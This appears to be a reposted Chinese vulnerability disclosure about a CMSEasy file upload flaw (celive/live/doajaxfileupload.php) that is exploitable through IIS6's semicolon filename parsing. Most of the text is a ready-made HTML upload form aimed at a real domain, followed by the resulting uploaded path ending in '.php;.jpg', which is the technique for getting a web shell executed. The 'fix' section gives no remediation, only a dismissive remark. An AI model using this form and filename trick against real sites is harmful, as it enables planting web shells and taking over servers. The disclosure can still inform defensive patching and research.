漏洞 文件: celive\live\doajaxfileupload.php
<form enctype="multipart/form-data" method="post" action="http://HdhCmsTestcmseasy.cn/celive/live/doajaxfileupload.php"> <input type="file" name="fileToUpload"> <input type="submit" value="上传"> </form>
http://HdhCmsTestcmseasy.cn/celive/uploadfiles/CELIVE-2vOWcBQMQR.php;.jpg
漏洞证明:
修复方案: 应该懂吧。。
查看更多关于cmseasy文件上传+IIS6解释漏洞 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13773